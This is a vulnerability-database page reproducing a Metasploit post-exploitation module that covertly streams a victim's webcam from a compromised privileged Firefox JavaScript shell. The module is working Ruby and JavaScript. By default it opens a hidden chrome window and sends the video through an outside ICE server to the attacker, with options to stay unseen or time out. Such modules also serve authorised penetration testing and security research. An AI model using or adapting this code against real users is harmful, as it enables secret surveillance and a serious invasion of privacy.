Lucene search
K

Firefox Webcam Chat on Privileged Javascript Shell

🗓️ 11 Jun 2014 20:10:22Reported by joev <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 52 Views

Firefox Webcam Chat Privilege Escalatio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
  include Msf::Post::WebRTC

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell',
        'Description' => %q{
          This module allows streaming a webcam from a privileged Firefox Javascript shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'References' => [
          [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
        ],
        'DisclosureDate' => '2014-05-13'
      )
    )

    register_options([
      OptBool.new('CLOSE', [false, 'Forcibly close previous chat session', false]),
      OptBool.new('VISIBLE', [false, 'Show a window containing the chat to the target', false]),
      OptInt.new('TIMEOUT', [false, 'End the chat session after this many seconds', -1]),
      OptString.new('ICESERVER', [true, 'The ICE server that sets up the P2P connection', 'wsnodejs.jit.su:80'])
    ])
  end

  def run
    unless os_check
      print_error 'Windows versions of Firefox are not supported at this time [RM #8810].'
      return
    end

    server = datastore['ICESERVER']
    offerer_id = Rex::Text.rand_text_alphanumeric(10)
    channel = Rex::Text.rand_text_alphanumeric(20)

    result = js_exec(js_payload(server, offerer_id, channel))

    if datastore['CLOSE']
      print_status 'Stream closed.'
    elsif result.present?
      print_status result
      connect_video_chat(server, channel, offerer_id)
    else
      print_warning 'No response received'
    end
  end

  def os_check
    user_agent = js_exec(%|
      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
    |)
    user_agent !~ /windows/i
  end

  def js_payload(server, offerer_id, channel)
    interface = load_interface('offerer.html')
    api = load_api_code

    interface.gsub!(/=SERVER=/, server)
    interface.gsub!(/=CHANNEL=/, channel)
    interface.gsub!(/=OFFERERID=/, offerer_id)

    if datastore['TIMEOUT'] > 0
      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000}); "
    end

    url = if datastore['CLOSE']
            '"about:blank"'
          else
            '"data:text/html;base64,"+html'
          end

    name = if datastore['VISIBLE']
             Rex::Text.rand_text_alphanumeric(10)
           else
             '_self'
           end

    %|
      (function(send){
        try {

          var AppShellService = Components
             .classes["@mozilla.org/appshell/appShellService;1"]
             .getService(Components.interfaces.nsIAppShellService);

          var html = "#{Rex::Text.encode_base64(interface)}";
          var url = #{url};
          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
          send("Streaming webcam...");

        } catch (e) {
          send(e);
        }
      })(this.send);
    |
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
6.9Medium risk
Vulners AI Score6.9
52